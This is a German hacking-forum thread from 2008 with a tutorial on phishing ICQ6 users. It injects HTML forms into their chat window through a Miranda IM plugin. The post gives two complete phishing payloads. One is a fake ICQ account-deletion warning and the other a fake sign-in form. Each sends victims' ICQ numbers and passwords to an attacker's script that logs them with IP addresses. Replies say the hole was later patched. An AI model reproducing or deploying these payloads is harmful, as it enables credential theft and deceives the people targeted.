[Hacking] ICQ6 - Professional Phising

Dieses Thema im Forum "Security Tutorials" wurde erstellt von B0B, 8. Januar 2008 .

Schlagworte:
Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. 8. Januar 2008
    Zuletzt von einem Moderator bearbeitet: 14. April 2017
    ICQ6 - Professional Phising

    Tach,

    du liest gerade ein Tutorial über professionelles ICQ6 phishing.
    Wieso professionell? Ganz einfach: Du kannst direkt in das Eingabefenster von ICQ6
    Usern eine Phishingform einfügen.

    Vorraussetzung:
    - Etwas Hirn
    - PHP-fähiger Space

    Werkzeug:
    - Miranda IM (Miranda IM - Download)
    - ICQ+ Plugin/Mod (Miranda IM - Addons - Fusion Popup+)
    - Phisingscript (könnt selber eines erstellen oder meines nehmen: No File | xup.in)

    Vorgehen:
    1. Installiert Miranda und das Plugin.
    2. Das Phisingscript auf den Server legen.
    3. Ein "Opfer" suchen - wenn gefunden, dann rechtsklick und "send tzer" klicken.
    4. Nun wählt ihr unten zuerst das gewünschte tzer aus (is eigentlich egal..).
    5. Wenn ihr das tzer ausgewählt habt, gebt ihr oben den "phisingcode" ein.

    Der passende Code zu meinem Phisingscript:

    Code:
    </a><br><br><br><br><img src=http://icq.com.idoo.com/icq.png border=0><br><br><font color=black>Sehr geehrter ICQ-User,<br><br>das ICQ-Team wird demn&auml;chst die Server bereinigen.<br>Somit werden alle alten und unbenutzten Accounts gel&ouml;scht.<br>Bitte beachten Sie, dass diese Bereinigung notwendig ist,<br>um die Servergeschwindigkeit aufrecht zu erhalten.<br>Um einer L&ouml;schung zu entgehen, m&uuml;ssen Sie Ihren Account best&auml;tigen!<br><br>Bitte beachten sie, dass sie diese Aufforderung zur Best&auml;tigung Ihres Accounts<br>nur <u>einmal</u> erhalten. Wenn Sie Ihren ICQ-Account nicht best&auml;tigen,<br>wird er zum 12.01.2008 unwiderruflich aus dem ICQ-Register gel&ouml;scht!<br><br>Um Ihren Account zu best&auml;tigen und somit eine L&ouml;schung auszuschlie&szlig;en,<br>m&uuml;ssen Sie unten Ihre ICQ-Daten eingeben und auf Best&auml;tigen klicken.<br><br>Wir bitten um Ihr Verst&auml;ndnis!<br><br><form action=*HIER DEINE URL* method=GET>Ihre ICQ-Nummer:<input type=text name=uin><br>Ihr ICQ-Passwort:<input type=password name=pass><br><input type=submit name=send value=Best&auml;tigen></form><br>Vielen Dank, <br><br>mit freundlichen Gr&uuml;&szlig;en,<br>das ICQ-Team</font>
    Ein anderer, aber auch sehr seriös wirkender Code:

    Code:
    </a><link rel='STYLESHEET' type='text/css' href='http://icq.com/karma/css/karma.css?v=2'><script src='http://www.icq.com/karma/js/login_page.js' language='javascript' type='text/javascript'></script><form name='login' action=*HIER DEINE URL* method=GET><div class='d1-3'>You have been signed out of the ICQ Network, please log in:</div><div class='d1-4'><div class='d1-4-1'>ICQ Number or Email</div><div class='d1-4-2'>ICQ Password</div><div class='d1-4-3'><input type='text' name='uin' value='' class='d1-4-input' onkeydown='uin_field_change()'></div><div class='d1-4-4'><input type='password' name='pass' class='d1-4-input'></div><div class='d1-4-5'><input type='image' alt='Einloggen' src='http://icq.com/karma/img/s_login.gif' border='0'></div><div class='d1-4-6'><input type='checkbox' class='d1-4-chk' id='rem' name='rem' value='1'><span class='d1-4-rem' onclick='remember_me_check()'>&nbsp;Remember me</span>&nbsp;<img src='http://icq.com/karma/img/info.gif' title='More Info' class='d1-4-img' alt='' border='0' width='14' height='14' onclick=window.open('http://www.icq.com/legal/legal_popup_message.html',null,'height=200,width=600,status=no,toolbar=no,menubar=no,location=no')></div></div></form></div><div class='d1-1'><strong>Important! </strong>The ICQ staff will NEVER ask you for your password, so don't tell it to anyone!</div>
    6. In diesen Codes müsst ihr nurnoch die Form "Action" ändern (momentan steht dort: "*HIER DEINE URL*"). Dort gebt ihr die url zum Phisingscript an (Achtung, ohne "").
    7. Wenn ihr alles geändert habt, könnt ihr den Code in das erste tzer feld eingeben und verschicken.
    8. Wenn der User genug dumm ist, gibt er sein passwort ein.
    9. Die Daten werden mit Datum, Uhrzeit und IP in einer Textdatei beim Phisingscript gespeichert.

    So das wars...


    PS: Ich weiß damit wird Kiddies nur geholfen, aber mir war sehr langweilig. Ausserdem: Was will man schon mit ICQ Uins ?
     
  3. 15. Juli 2008
    AW: ICQ6 - Professional Phising

    der link zu deinem ICQ+ Plugin ist tot
     
  4. 16. Juli 2008
    AW: ICQ6 - Professional Phising

    das ganze geht auch nichtmehr. sicherheitsloch wurde von icq nach sage und schreibe 4 monaten (oder wars noch länger?) gestopft!!
     
  5. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.